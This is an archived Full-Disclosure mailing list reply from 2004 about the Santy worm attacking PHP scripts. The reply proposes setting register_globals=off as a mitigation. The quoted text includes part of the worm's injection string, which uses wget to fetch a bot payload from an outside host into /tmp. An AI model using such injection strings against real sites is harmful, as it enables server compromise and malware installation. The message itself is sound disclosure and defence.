|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
[Full-Disclosure] Re: New Santy-Worm attacks *all* PHP-skripts
From: Pekka Savola (pekkas
netcore.fi)
Date: Sat Dec 25 2004 - 13:59:50 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
On Sat, 25 Dec 2004, Juergen Schmidt wrote:
> It uses the brasilian Google site to find all kinds of PHP skripts.
> It parses their URLs and overwrites variables with strings like:
>
> 'http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget
> www.visualcoders.net/spybot.txt;...
And AFAICS, this can be prevented by setting register_globals=off in
php.ini.
--
Pekka Savola "You each name yourselves king, yet the
Netcore Oy kingdom bleeds."
Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]